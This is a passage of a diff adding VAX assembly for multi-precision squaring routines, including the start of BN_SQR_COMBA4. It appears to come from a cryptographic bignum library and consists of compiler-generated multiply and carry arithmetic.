+	cmpl	r9,r2
+	bgequ	noname.479
+	incl	r8
+noname.479:
+
+	bicl3	#-65536,20(r3),r4
+	movzwl	22(r3),r1
+	bicl2	#-65536,r1
+	bicl3	#-65536,12(r3),r2
+	movzwl	14(r3),r0
+	bicl2	#-65536,r0
+	movl	r4,r6
+	movl	r1,r5
+	mull3	r0,r6,-296(fp)
+	mull2	r2,r6
+	mull3	r2,r5,-300(fp)
+	mull2	r0,r5
+	addl3	-296(fp),-300(fp),r0
+	bicl3	#0,r0,-296(fp)
+	cmpl	-296(fp),-300(fp)
+	bgequ	noname.480
+	addl2	#65536,r5
+noname.480:
+	movzwl	-294(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,r5
+	bicl3	#-65536,-296(fp),r0
+	ashl	#16,r0,-300(fp)
+	addl2	-300(fp),r6
+	bicl2	#0,r6
+	cmpl	r6,-300(fp)
+	bgequ	noname.481
+	incl	r5
+noname.481:
+	movl	r6,r3
+	movl	r5,r2
+	bbc	#31,r2,noname.482
+	incl	r8
+noname.482:
+	addl2	r2,r2
+	bicl2	#0,r2
+	bbc	#31,r3,noname.483
+	incl	r2
+noname.483:
+	addl2	r3,r3
+	bicl2	#0,r3
+	addl2	r3,r7
+	bicl2	#0,r7
+	cmpl	r7,r3
+	bgequ	noname.484
+	incl	r2
+	bicl3	#0,r2,r0
+	bneq	noname.484
+	incl	r8
+noname.484:
+	addl2	r2,r9
+	bicl2	#0,r9
+	cmpl	r9,r2
+	bgequ	noname.485
+	incl	r8
+noname.485:
+
+	movl	8(ap),r0
+	bicl3	#-65536,24(r0),r3
+	movzwl	26(r0),r1
+	bicl2	#-65536,r1
+	bicl3	#-65536,8(r0),r2
+	movzwl	10(r0),r0
+	bicl2	#-65536,r0
+	movl	r3,r5
+	movl	r1,r4
+	mull3	r0,r5,-304(fp)
+	mull2	r2,r5
+	mull3	r2,r4,-308(fp)
+	mull2	r0,r4
+	addl3	-304(fp),-308(fp),r0
+	bicl3	#0,r0,-304(fp)
+	cmpl	-304(fp),-308(fp)
+	bgequ	noname.486
+	addl2	#65536,r4
+noname.486:
+	movzwl	-302(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,r4
+	bicl3	#-65536,-304(fp),r0
+	ashl	#16,r0,-308(fp)
+	addl2	-308(fp),r5
+	bicl2	#0,r5
+	cmpl	r5,-308(fp)
+	bgequ	noname.487
+	incl	r4
+noname.487:
+	movl	r5,r3
+	movl	r4,r2
+	bbc	#31,r2,noname.488
+	incl	r8
+noname.488:
+	addl2	r2,r2
+	bicl2	#0,r2
+	bbc	#31,r3,noname.489
+	incl	r2
+noname.489:
+	addl2	r3,r3
+	bicl2	#0,r3
+	addl2	r3,r7
+	bicl2	#0,r7
+	cmpl	r7,r3
+	bgequ	noname.490
+	incl	r2
+	bicl3	#0,r2,r0
+	bneq	noname.490
+	incl	r8
+noname.490:
+	addl2	r2,r9
+	bicl2	#0,r9
+	cmpl	r9,r2
+	bgequ	noname.491
+	incl	r8
+noname.491:
+
+	movl	8(ap),r0
+	bicl3	#-65536,28(r0),r3
+	movzwl	30(r0),r1
+	bicl2	#-65536,r1
+	bicl3	#-65536,4(r0),r2
+	movzwl	6(r0),r0
+	bicl2	#-65536,r0
+	movl	r3,r5
+	movl	r1,r4
+	mull3	r0,r5,-312(fp)
+	mull2	r2,r5
+	mull3	r2,r4,-316(fp)
+	mull2	r0,r4
+	addl3	-312(fp),-316(fp),r0
+	bicl3	#0,r0,-312(fp)
+	cmpl	-312(fp),-316(fp)
+	bgequ	noname.492
+	addl2	#65536,r4
+noname.492:
+	movzwl	-310(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,r4
+	bicl3	#-65536,-312(fp),r0
+	ashl	#16,r0,-316(fp)
+	addl2	-316(fp),r5
+	bicl2	#0,r5
+	cmpl	r5,-316(fp)
+	bgequ	noname.493
+	incl	r4
+noname.493:
+	movl	r5,r3
+	movl	r4,r2
+	bbc	#31,r2,noname.494
+	incl	r8
+noname.494:
+	addl2	r2,r2
+	bicl2	#0,r2
+	bbc	#31,r3,noname.495
+	incl	r2
+noname.495:
+	addl2	r3,r3
+	bicl2	#0,r3
+	addl2	r3,r7
+	bicl2	#0,r7
+	cmpl	r7,r3
+	bgequ	noname.496
+	incl	r2
+	bicl3	#0,r2,r0
+	bneq	noname.496
+	incl	r8
+noname.496:
+	addl2	r2,r9
+	bicl2	#0,r9
+	cmpl	r9,r2
+	bgequ	noname.497
+	incl	r8
+noname.497:
+
+	movl	4(ap),r0
+	movl	r7,32(r0)
+
+	clrl	r7
+
+	movl	8(ap),r0
+	bicl3	#-65536,28(r0),r3
+	movzwl	30(r0),r2
+	bicl3	#-65536,8(r0),r1
+	movzwl	10(r0),r0
+	bicl2	#-65536,r0
+	movl	r3,r4
+	bicl3	#-65536,r2,-328(fp)
+	mull3	r0,r4,-320(fp)
+	mull2	r1,r4
+	mull3	r1,-328(fp),-324(fp)
+	mull2	r0,-328(fp)
+	addl3	-320(fp),-324(fp),r0
+	bicl3	#0,r0,-320(fp)
+	cmpl	-320(fp),-324(fp)
+	bgequ	noname.498
+	addl2	#65536,-328(fp)
+noname.498:
+	movzwl	-318(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,-328(fp)
+	bicl3	#-65536,-320(fp),r0
+	ashl	#16,r0,-324(fp)
+	addl2	-324(fp),r4
+	bicl2	#0,r4
+	cmpl	r4,-324(fp)
+	bgequ	noname.499
+	incl	-328(fp)
+noname.499:
+	movl	r4,r3
+	movl	-328(fp),r2
+	bbc	#31,r2,noname.500
+	incl	r7
+noname.500:
+	addl2	r2,r2
+	bicl2	#0,r2
+	bbc	#31,r3,noname.501
+	incl	r2
+noname.501:
+	addl2	r3,r3
+	bicl2	#0,r3
+	addl2	r3,r9
+	bicl2	#0,r9
+	cmpl	r9,r3
+	bgequ	noname.502
+	incl	r2
+	bicl3	#0,r2,r0
+	bneq	noname.502
+	incl	r7
+noname.502:
+	addl2	r2,r8
+	bicl2	#0,r8
+	cmpl	r8,r2
+	bgequ	noname.503
+	incl	r7
+noname.503:
+
+	movl	8(ap),r0
+	movzwl	26(r0),r2
+	bicl3	#-65536,12(r0),r3
+	movzwl	14(r0),r1
+	bicl2	#-65536,r1
+	bicl3	#-65536,24(r0),-340(fp)
+	bicl3	#-65536,r2,-344(fp)
+	mull3	r1,-340(fp),-332(fp)
+	mull2	r3,-340(fp)
+	mull3	r3,-344(fp),-336(fp)
+	mull2	r1,-344(fp)
+	addl3	-332(fp),-336(fp),r0
+	bicl3	#0,r0,-332(fp)
+	cmpl	-332(fp),-336(fp)
+	bgequ	noname.504
+	addl2	#65536,-344(fp)
+noname.504:
+	movzwl	-330(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,-344(fp)
+	bicl3	#-65536,-332(fp),r0
+	ashl	#16,r0,-336(fp)
+	addl3	-336(fp),-340(fp),r0
+	bicl3	#0,r0,-340(fp)
+	cmpl	-340(fp),-336(fp)
+	bgequ	noname.505
+	incl	-344(fp)
+noname.505:
+	movl	-340(fp),r3
+	movl	-344(fp),r2
+	bbc	#31,r2,noname.506
+	incl	r7
+noname.506:
+	addl2	r2,r2
+	bicl2	#0,r2
+	bbc	#31,r3,noname.507
+	incl	r2
+noname.507:
+	addl2	r3,r3
+	bicl2	#0,r3
+	addl2	r3,r9
+	bicl2	#0,r9
+	cmpl	r9,r3
+	bgequ	noname.508
+	incl	r2
+	bicl3	#0,r2,r0
+	bneq	noname.508
+	incl	r7
+noname.508:
+	addl2	r2,r8
+	bicl2	#0,r8
+	cmpl	r8,r2
+	bgequ	noname.509
+	incl	r7
+noname.509:
+
+	movl	8(ap),r0
+	movzwl	22(r0),r2
+	bicl3	#-65536,16(r0),r3
+	movzwl	18(r0),r1
+	bicl2	#-65536,r1
+	bicl3	#-65536,20(r0),-356(fp)
+	bicl3	#-65536,r2,-360(fp)
+	mull3	r1,-356(fp),-348(fp)
+	mull2	r3,-356(fp)
+	mull3	r3,-360(fp),-352(fp)
+	mull2	r1,-360(fp)
+	addl3	-348(fp),-352(fp),r0
+	bicl3	#0,r0,-348(fp)
+	cmpl	-348(fp),-352(fp)
+	bgequ	noname.510
+	addl2	#65536,-360(fp)
+noname.510:
+	movzwl	-346(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,-360(fp)
+	bicl3	#-65536,-348(fp),r0
+	ashl	#16,r0,-352(fp)
+	addl3	-352(fp),-356(fp),r0
+	bicl3	#0,r0,-356(fp)
+	cmpl	-356(fp),-352(fp)
+	bgequ	noname.511
+	incl	-360(fp)
+noname.511:
+	movl	-356(fp),r3
+	movl	-360(fp),r2
+	bbc	#31,r2,noname.512
+	incl	r7
+noname.512:
+	addl2	r2,r2
+	bicl2	#0,r2
+	bbc	#31,r3,noname.513
+	incl	r2
+noname.513:
+	addl2	r3,r3
+	bicl2	#0,r3
+	addl2	r3,r9
+	bicl2	#0,r9
+	cmpl	r9,r3
+	bgequ	noname.514
+	incl	r2
+	bicl3	#0,r2,r0
+	bneq	noname.514
+	incl	r7
+noname.514:
+	addl2	r2,r8
+	bicl2	#0,r8
+	cmpl	r8,r2
+	bgequ	noname.515
+	incl	r7
+noname.515:
+
+	movl	4(ap),r0
+	movl	r9,36(r0)
+
+	clrl	r9
+
+	movl	8(ap),r3
+	movl	20(r3),r4
+	bicl3	#-65536,r4,-364(fp)
+	extzv	#16,#16,r4,r0
+	bicl3	#-65536,r0,r4
+	movl	-364(fp),r0
+	mull3	r0,r4,-368(fp)
+	mull3	r0,r0,-364(fp)
+	mull2	r4,r4
+	bicl3	#32767,-368(fp),r0
+	extzv	#15,#17,r0,r0
+	addl2	r0,r4
+	bicl3	#-65536,-368(fp),r0
+	ashl	#17,r0,-368(fp)
+	addl3	-364(fp),-368(fp),r0
+	bicl3	#0,r0,-364(fp)
+	cmpl	-364(fp),-368(fp)
+	bgequ	noname.516
+	incl	r4
+noname.516:
+	movl	-364(fp),r1
+	movl	r4,r2
+	addl2	r1,r8
+	bicl2	#0,r8
+	cmpl	r8,r1
+	bgequ	noname.517
+	incl	r2
+noname.517:
+	addl2	r2,r7
+	bicl2	#0,r7
+	cmpl	r7,r2
+	bgequ	noname.518
+	incl	r9
+noname.518:
+
+	bicl3	#-65536,24(r3),r4
+	movzwl	26(r3),r1
+	bicl2	#-65536,r1
+	bicl3	#-65536,16(r3),r2
+	movzwl	18(r3),r0
+	bicl2	#-65536,r0
+	movl	r4,r6
+	movl	r1,r5
+	mull3	r0,r6,-372(fp)
+	mull2	r2,r6
+	mull3	r2,r5,-376(fp)
+	mull2	r0,r5
+	addl3	-372(fp),-376(fp),r0
+	bicl3	#0,r0,-372(fp)
+	cmpl	-372(fp),-376(fp)
+	bgequ	noname.519
+	addl2	#65536,r5
+noname.519:
+	movzwl	-370(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,r5
+	bicl3	#-65536,-372(fp),r0
+	ashl	#16,r0,-376(fp)
+	addl2	-376(fp),r6
+	bicl2	#0,r6
+	cmpl	r6,-376(fp)
+	bgequ	noname.520
+	incl	r5
+noname.520:
+	movl	r6,r3
+	movl	r5,r2
+	bbc	#31,r2,noname.521
+	incl	r9
+noname.521:
+	addl2	r2,r2
+	bicl2	#0,r2
+	bbc	#31,r3,noname.522
+	incl	r2
+noname.522:
+	addl2	r3,r3
+	bicl2	#0,r3
+	addl2	r3,r8
+	bicl2	#0,r8
+	cmpl	r8,r3
+	bgequ	noname.523
+	incl	r2
+	bicl3	#0,r2,r0
+	bneq	noname.523
+	incl	r9
+noname.523:
+	addl2	r2,r7
+	bicl2	#0,r7
+	cmpl	r7,r2
+	bgequ	noname.524
+	incl	r9
+noname.524:
+
+	movl	8(ap),r0
+	bicl3	#-65536,28(r0),r3
+	movzwl	30(r0),r1
+	bicl2	#-65536,r1
+	bicl3	#-65536,12(r0),r2
+	movzwl	14(r0),r0
+	bicl2	#-65536,r0
+	movl	r3,r5
+	movl	r1,r4
+	mull3	r0,r5,-380(fp)
+	mull2	r2,r5
+	mull3	r2,r4,-384(fp)
+	mull2	r0,r4
+	addl3	-380(fp),-384(fp),r0
+	bicl3	#0,r0,-380(fp)
+	cmpl	-380(fp),-384(fp)
+	bgequ	noname.525
+	addl2	#65536,r4
+noname.525:
+	movzwl	-378(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,r4
+	bicl3	#-65536,-380(fp),r0
+	ashl	#16,r0,-384(fp)
+	addl2	-384(fp),r5
+	bicl2	#0,r5
+	cmpl	r5,-384(fp)
+	bgequ	noname.526
+	incl	r4
+noname.526:
+	movl	r5,r3
+	movl	r4,r2
+	bbc	#31,r2,noname.527
+	incl	r9
+noname.527:
+	addl2	r2,r2
+	bicl2	#0,r2
+	bbc	#31,r3,noname.528
+	incl	r2
+noname.528:
+	addl2	r3,r3
+	bicl2	#0,r3
+	addl2	r3,r8
+	bicl2	#0,r8
+	cmpl	r8,r3
+	bgequ	noname.529
+	incl	r2
+	bicl3	#0,r2,r0
+	bneq	noname.529
+	incl	r9
+noname.529:
+	addl2	r2,r7
+	bicl2	#0,r7
+	cmpl	r7,r2
+	bgequ	noname.530
+	incl	r9
+noname.530:
+	movl	4(ap),r0
+	movl	r8,40(r0)
+
+	clrl	r8
+
+	movl	8(ap),r0
+	bicl3	#-65536,28(r0),r3
+	movzwl	30(r0),r1
+	bicl2	#-65536,r1
+	bicl3	#-65536,16(r0),r2
+	movzwl	18(r0),r0
+	bicl2	#-65536,r0
+	movl	r3,r5
+	movl	r1,r4
+	mull3	r0,r5,-388(fp)
+	mull2	r2,r5
+	mull3	r2,r4,-392(fp)
+	mull2	r0,r4
+	addl3	-388(fp),-392(fp),r0
+	bicl3	#0,r0,-388(fp)
+	cmpl	-388(fp),-392(fp)
+	bgequ	noname.531
+	addl2	#65536,r4
+noname.531:
+	movzwl	-386(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,r4
+	bicl3	#-65536,-388(fp),r0
+	ashl	#16,r0,-392(fp)
+	addl2	-392(fp),r5
+	bicl2	#0,r5
+	cmpl	r5,-392(fp)
+	bgequ	noname.532
+	incl	r4
+noname.532:
+	movl	r5,r3
+	movl	r4,r2
+	bbc	#31,r2,noname.533
+	incl	r8
+noname.533:
+	addl2	r2,r2
+	bicl2	#0,r2
+	bbc	#31,r3,noname.534
+	incl	r2
+noname.534:
+	addl2	r3,r3
+	bicl2	#0,r3
+	addl2	r3,r7
+	bicl2	#0,r7
+	cmpl	r7,r3
+	bgequ	noname.535
+	incl	r2
+	bicl3	#0,r2,r0
+	bneq	noname.535
+	incl	r8
+noname.535:
+	addl2	r2,r9
+	bicl2	#0,r9
+	cmpl	r9,r2
+	bgequ	noname.536
+	incl	r8
+noname.536:
+
+	movl	8(ap),r0
+	bicl3	#-65536,24(r0),r3
+	movzwl	26(r0),r1
+	bicl2	#-65536,r1
+	bicl3	#-65536,20(r0),r2
+	movzwl	22(r0),r0
+	bicl2	#-65536,r0
+	movl	r3,r5
+	movl	r1,r4
+	mull3	r0,r5,-396(fp)
+	mull2	r2,r5
+	mull3	r2,r4,-400(fp)
+	mull2	r0,r4
+	addl3	-396(fp),-400(fp),r0
+	bicl3	#0,r0,-396(fp)
+	cmpl	-396(fp),-400(fp)
+	bgequ	noname.537
+	addl2	#65536,r4
+noname.537:
+	movzwl	-394(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,r4
+	bicl3	#-65536,-396(fp),r0
+	ashl	#16,r0,-400(fp)
+	addl2	-400(fp),r5
+	bicl2	#0,r5
+	cmpl	r5,-400(fp)
+	bgequ	noname.538
+	incl	r4
+noname.538:
+	movl	r5,r3
+	movl	r4,r2
+	bbc	#31,r2,noname.539
+	incl	r8
+noname.539:
+	addl2	r2,r2
+	bicl2	#0,r2
+	bbc	#31,r3,noname.540
+	incl	r2
+noname.540:
+	addl2	r3,r3
+	bicl2	#0,r3
+	addl2	r3,r7
+	bicl2	#0,r7
+	cmpl	r7,r3
+	bgequ	noname.541
+	incl	r2
+	bicl3	#0,r2,r0
+	bneq	noname.541
+	incl	r8
+noname.541:
+	addl2	r2,r9
+	bicl2	#0,r9
+	cmpl	r9,r2
+	bgequ	noname.542
+	incl	r8
+noname.542:
+
+	movl	4(ap),r0
+	movl	r7,44(r0)
+
+	clrl	r7
+
+	movl	8(ap),r3
+	movl	24(r3),r4
+	bicl3	#-65536,r4,r5
+	extzv	#16,#16,r4,r0
+	bicl3	#-65536,r0,r4
+	mull3	r5,r4,-404(fp)
+	mull2	r5,r5
+	mull2	r4,r4
+	bicl3	#32767,-404(fp),r0
+	extzv	#15,#17,r0,r0
+	addl2	r0,r4
+	bicl3	#-65536,-404(fp),r0
+	ashl	#17,r0,-404(fp)
+	addl2	-404(fp),r5
+	bicl2	#0,r5
+	cmpl	r5,-404(fp)
+	bgequ	noname.543
+	incl	r4
+noname.543:
+	movl	r5,r1
+	movl	r4,r2
+	addl2	r1,r9
+	bicl2	#0,r9
+	cmpl	r9,r1
+	bgequ	noname.544
+	incl	r2
+noname.544:
+	addl2	r2,r8
+	bicl2	#0,r8
+	cmpl	r8,r2
+	bgequ	noname.545
+	incl	r7
+noname.545:
+
+	movzwl	30(r3),r2
+	bicl3	#-65536,20(r3),r1
+	movzwl	22(r3),r0
+	bicl2	#-65536,r0
+	bicl3	#-65536,28(r3),-416(fp)
+	bicl3	#-65536,r2,-420(fp)
+	mull3	r0,-416(fp),-408(fp)
+	mull2	r1,-416(fp)
+	mull3	r1,-420(fp),-412(fp)
+	mull2	r0,-420(fp)
+	addl3	-408(fp),-412(fp),r0
+	bicl3	#0,r0,-408(fp)
+	cmpl	-408(fp),-412(fp)
+	bgequ	noname.546
+	addl2	#65536,-420(fp)
+noname.546:
+	movzwl	-406(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,-420(fp)
+	bicl3	#-65536,-408(fp),r0
+	ashl	#16,r0,-412(fp)
+	addl3	-412(fp),-416(fp),r0
+	bicl3	#0,r0,-416(fp)
+	cmpl	-416(fp),-412(fp)
+	bgequ	noname.547
+	incl	-420(fp)
+noname.547:
+	movl	-416(fp),r3
+	movl	-420(fp),r2
+	bbc	#31,r2,noname.548
+	incl	r7
+noname.548:
+	addl2	r2,r2
+	bicl2	#0,r2
+	bbc	#31,r3,noname.549
+	incl	r2
+noname.549:
+	addl2	r3,r3
+	bicl2	#0,r3
+	addl2	r3,r9
+	bicl2	#0,r9
+	cmpl	r9,r3
+	bgequ	noname.550
+	incl	r2
+	bicl3	#0,r2,r0
+	bneq	noname.550
+	incl	r7
+noname.550:
+	addl2	r2,r8
+	bicl2	#0,r8
+	cmpl	r8,r2
+	bgequ	noname.551
+	incl	r7
+noname.551:
+
+	movl	4(ap),r0
+	movl	r9,48(r0)
+
+	clrl	r9
+
+	movl	8(ap),r0
+	movzwl	30(r0),r2
+	bicl3	#-65536,24(r0),r3
+	movzwl	26(r0),r1
+	bicl2	#-65536,r1
+	bicl3	#-65536,28(r0),-432(fp)
+	bicl3	#-65536,r2,-436(fp)
+	mull3	r1,-432(fp),-424(fp)
+	mull2	r3,-432(fp)
+	mull3	r3,-436(fp),-428(fp)
+	mull2	r1,-436(fp)
+	addl3	-424(fp),-428(fp),r0
+	bicl3	#0,r0,-424(fp)
+	cmpl	-424(fp),-428(fp)
+	bgequ	noname.552
+	addl2	#65536,-436(fp)
+noname.552:
+	movzwl	-422(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,-436(fp)
+	bicl3	#-65536,-424(fp),r0
+	ashl	#16,r0,-428(fp)
+	addl3	-428(fp),-432(fp),r0
+	bicl3	#0,r0,-432(fp)
+	cmpl	-432(fp),-428(fp)
+	bgequ	noname.553
+	incl	-436(fp)
+noname.553:
+	movl	-432(fp),r3
+	movl	-436(fp),r2
+	bbc	#31,r2,noname.554
+	incl	r9
+noname.554:
+	addl2	r2,r2
+	bicl2	#0,r2
+	bbc	#31,r3,noname.555
+	incl	r2
+noname.555:
+	addl2	r3,r3
+	bicl2	#0,r3
+	addl2	r3,r8
+	bicl2	#0,r8
+	cmpl	r8,r3
+	bgequ	noname.556
+	incl	r2
+	bicl3	#0,r2,r0
+	bneq	noname.556
+	incl	r9
+noname.556:
+	addl2	r2,r7
+	bicl2	#0,r7
+	cmpl	r7,r2
+	bgequ	noname.557
+	incl	r9
+noname.557:
+
+	movl	4(ap),r4
+	movl	r8,52(r4)
+
+	clrl	r8
+
+	movl	8(ap),r0
+	movl	28(r0),r3
+	bicl3	#-65536,r3,-440(fp)
+	extzv	#16,#16,r3,r0
+	bicl3	#-65536,r0,r3
+	movl	-440(fp),r0
+	mull3	r0,r3,-444(fp)
+	mull3	r0,r0,-440(fp)
+	mull2	r3,r3
+	bicl3	#32767,-444(fp),r0
+	extzv	#15,#17,r0,r0
+	addl2	r0,r3
+	bicl3	#-65536,-444(fp),r0
+	ashl	#17,r0,-444(fp)
+	addl3	-440(fp),-444(fp),r0
+	bicl3	#0,r0,-440(fp)
+	cmpl	-440(fp),-444(fp)
+	bgequ	noname.558
+	incl	r3
+noname.558:
+	movl	-440(fp),r1
+	movl	r3,r2
+	addl2	r1,r7
+	bicl2	#0,r7
+	cmpl	r7,r1
+	bgequ	noname.559
+	incl	r2
+noname.559:
+	addl2	r2,r9
+	bicl2	#0,r9
+	cmpl	r9,r2
+	bgequ	noname.560
+	incl	r8
+noname.560:
+
+	movl	r7,56(r4)
+
+	movl	r9,60(r4)
+
+	ret	
+
+
+
+;r=4 ;(AP)
+;a=8 ;(AP)
+;b=12 ;(AP)
+;n=16 ;(AP)	n	by value (input)
+
+	.psect	code,nowrt
+
+.entry	BN_SQR_COMBA4,^m<r2,r3,r4,r5,r6,r7,r8,r9,r10>
+	subl2	#44,sp
+
+	clrq	r8
+
+	clrl	r10
+
+	movl	8(ap),r5
+	movl	(r5),r3
+	bicl3	#-65536,r3,r4
+	extzv	#16,#16,r3,r0
+	bicl3	#-65536,r0,r3
+	mull3	r4,r3,-4(fp)
+	mull2	r4,r4
+	mull2	r3,r3
+	bicl3	#32767,-4(fp),r0
+	extzv	#15,#17,r0,r0
+	addl2	r0,r3
+	bicl3	#-65536,-4(fp),r0
+	ashl	#17,r0,-4(fp)
+	addl2	-4(fp),r4
+	bicl2	#0,r4
+	cmpl	r4,-4(fp)
+	bgequ	noname.563
+	incl	r3
+noname.563:
+	movl	r4,r1
+	movl	r3,r2
+	addl2	r1,r9
+	bicl2	#0,r9
+	cmpl	r9,r1
+	bgequ	noname.564
+	incl	r2
+noname.564:
+	addl2	r2,r8
+	bicl2	#0,r8
+	cmpl	r8,r2
+	bgequ	noname.565
+	incl	r10
+noname.565:
+
+	movl	r9,@4(ap)
+
+	clrl	r9
+
+	bicl3	#-65536,4(r5),r3
+	movzwl	6(r5),r1
+	bicl2	#-65536,r1
+	bicl3	#-65536,(r5),r2
+	movzwl	2(r5),r0
+	bicl2	#-65536,r0
+	movl	r3,r6
+	movl	r1,r4
+	mull3	r0,r6,-8(fp)
+	mull2	r2,r6
+	mull2	r4,r2
+	mull2	r0,r4
+	addl3	-8(fp),r2,r0
+	bicl3	#0,r0,-8(fp)
+	cmpl	-8(fp),r2
+	bgequ	noname.566
+	addl2	#65536,r4
+noname.566:
+	movzwl	-6(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,r4
+	bicl3	#-65536,-8(fp),r0
+	ashl	#16,r0,r1
+	addl2	r1,r6
+	bicl2	#0,r6
+	cmpl	r6,r1
+	bgequ	noname.567
+	incl	r4
+noname.567:
+	movl	r6,r3
+	movl	r4,r2
+	bbc	#31,r2,noname.568
+	incl	r9
+noname.568:
+	addl2	r2,r2
+	bicl2	#0,r2
+	bbc	#31,r3,noname.569
+	incl	r2
+noname.569:
+	addl2	r3,r3
+	bicl2	#0,r3
+	addl2	r3,r8
+	bicl2	#0,r8
+	cmpl	r8,r3
+	bgequ	noname.570
+	incl	r2
+	bicl3	#0,r2,r0
+	bneq	noname.570
+	incl	r9
+noname.570:
+	addl2	r2,r10
+	bicl2	#0,r10
+	cmpl	r10,r2
+	bgequ	noname.571
+	incl	r9
+noname.571:
+
+	movl	4(ap),r0
+	movl	r8,4(r0)
+
+	clrl	r8
+
+	movl	8(ap),r4
+	movl	4(r4),r3
+	bicl3	#-65536,r3,r5
+	extzv	#16,#16,r3,r0
+	bicl3	#-65536,r0,r3
+	mull3	r5,r3,r1
+	mull2	r5,r5
+	mull2	r3,r3
+	bicl3	#32767,r1,r0
+	extzv	#15,#17,r0,r0
+	addl2	r0,r3
+	bicl2	#-65536,r1
+	ashl	#17,r1,r1
+	addl2	r1,r5
+	bicl2	#0,r5
+	cmpl	r5,r1
+	bgequ	noname.572
+	incl	r3
+noname.572:
+	movl	r5,r1
+	movl	r3,r2
+	addl2	r1,r10
+	bicl2	#0,r10
+	cmpl	r10,r1
+	bgequ	noname.573
+	incl	r2
+noname.573:
+	addl2	r2,r9
+	bicl2	#0,r9
+	cmpl	r9,r2
+	bgequ	noname.574
+	incl	r8
+noname.574:
+
+	bicl3	#-65536,8(r4),r3
+	movzwl	10(r4),r1
+	bicl2	#-65536,r1
+	bicl3	#-65536,(r4),r2
+	movzwl	2(r4),r0
+	bicl2	#-65536,r0
+	movl	r3,r6
+	movl	r1,r5
+	mull3	r0,r6,r7
+	mull2	r2,r6
+	mull2	r5,r2
+	mull2	r0,r5
+	addl2	r2,r7
+	bicl2	#0,r7
+	cmpl	r7,r2
+	bgequ	noname.575
+	addl2	#65536,r5
+noname.575:
+	extzv	#16,#16,r7,r0
+	bicl2	#-65536,r0
+	addl2	r0,r5
+	bicl3	#-65536,r7,r0
+	ashl	#16,r0,r1
+	addl2	r1,r6
+	bicl2	#0,r6
+	cmpl	r6,r1
+	bgequ	noname.576
+	incl	r5
+noname.576:
+	movl	r6,r3
+	movl	r5,r2
+	bbc	#31,r2,noname.577
+	incl	r8
+noname.577:
+	addl2	r2,r2
+	bicl2	#0,r2
+	bbc	#31,r3,noname.578
+	incl	r2
+noname.578:
+	addl2	r3,r3
+	bicl2	#0,r3
+	addl2	r3,r10
+	bicl2	#0,r10
+	cmpl	r10,r3
+	bgequ	noname.579
+	incl	r2
+	bicl3	#0,r2,r0
+	bneq	noname.579
+	incl	r8
+noname.579:
+	addl2	r2,r9
+	bicl2	#0,r9
+	cmpl	r9,r2
+	bgequ	noname.580
+	incl	r8
+noname.580:
+
+	movl	4(ap),r0
+	movl	r10,8(r0)
+
+	clrl	r10
+
+	movl	8(ap),r0
+	bicl3	#-65536,12(r0),r3
+	movzwl	14(r0),r1
+	bicl2	#-65536,r1
+	bicl3	#-65536,(r0),r2
+	movzwl	2(r0),r0
+	bicl2	#-65536,r0
+	movl	r3,r5
+	movl	r1,r4
+	mull3	r0,r5,r6
+	mull2	r2,r5
+	mull3	r2,r4,-12(fp)
+	mull2	r0,r4
+	addl2	-12(fp),r6
+	bicl2	#0,r6
+	cmpl	r6,-12(fp)
+	bgequ	noname.581
+	addl2	#65536,r4
+noname.581:
+	extzv	#16,#16,r6,r0
+	bicl2	#-65536,r0
+	addl2	r0,r4
+	bicl3	#-65536,r6,r0
+	ashl	#16,r0,-12(fp)
+	addl2	-12(fp),r5
+	bicl2	#0,r5
+	cmpl	r5,-12(fp)
+	bgequ	noname.582
+	incl	r4
+noname.582:
+	movl	r5,r3
+	movl	r4,r2
+	bbc	#31,r2,noname.583
+	incl	r10
+noname.583:
+	addl2	r2,r2
+	bicl2	#0,r2
+	bbc	#31,r3,noname.584
+	incl	r2
+noname.584:
+	addl2	r3,r3
+	bicl2	#0,r3
+	addl2	r3,r9
+	bicl2	#0,r9
+	cmpl	r9,r3
+	bgequ	noname.585
+	incl	r2
+	bicl3	#0,r2,r0
+	bneq	noname.585
+	incl	r10
+noname.585:
+	addl2	r2,r8
+	bicl2	#0,r8
+	cmpl	r8,r2
+	bgequ	noname.586
+	incl	r10
+noname.586:
+
+	movl	8(ap),r0
+	bicl3	#-65536,8(r0),r3
+	movzwl	10(r0),r1
+	bicl2	#-65536,r1
+	bicl3	#-65536,4(r0),r2
+	movzwl	6(r0),r0
+	bicl2	#-65536,r0
+	movl	r3,r5
+	movl	r1,r4
+	mull3	r0,r5,-16(fp)
+	mull2	r2,r5
+	mull3	r2,r4,-20(fp)
+	mull2	r0,r4
+	addl3	-16(fp),-20(fp),r0
+	bicl3	#0,r0,-16(fp)
+	cmpl	-16(fp),-20(fp)
+	bgequ	noname.587
+	addl2	#65536,r4
+noname.587:
+	movzwl	-14(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,r4
+	bicl3	#-65536,-16(fp),r0
+	ashl	#16,r0,-20(fp)
+	addl2	-20(fp),r5
+	bicl2	#0,r5
+	cmpl	r5,-20(fp)
+	bgequ	noname.588
+	incl	r4
+noname.588:
+	movl	r5,r3
+	movl	r4,r2
+	bbc	#31,r2,noname.589
+	incl	r10
+noname.589:
+	addl2	r2,r2
+	bicl2	#0,r2
+	bbc	#31,r3,noname.590
+	incl	r2
+noname.590:
+	addl2	r3,r3
+	bicl2	#0,r3
+	addl2	r3,r9
+	bicl2	#0,r9
+	cmpl	r9,r3
+	bgequ	noname.591
+	incl	r2
+	bicl3	#0,r2,r0
+	bneq	noname.591
+	incl	r10
+noname.591:
+	addl2	r2,r8
+	bicl2	#0,r8
+	cmpl	r8,r2
+	bgequ	noname.592
+	incl	r10
+noname.592:
+	movl	4(ap),r0
+	movl	r9,12(r0)
+
+	clrl	r9
+
+	movl	8(ap),r3
+	movl	8(r3),r4
+	bicl3	#-65536,r4,r5
+	extzv	#16,#16,r4,r0
+	bicl3	#-65536,r0,r4
+	mull3	r5,r4,-24(fp)
+	mull2	r5,r5
+	mull2	r4,r4
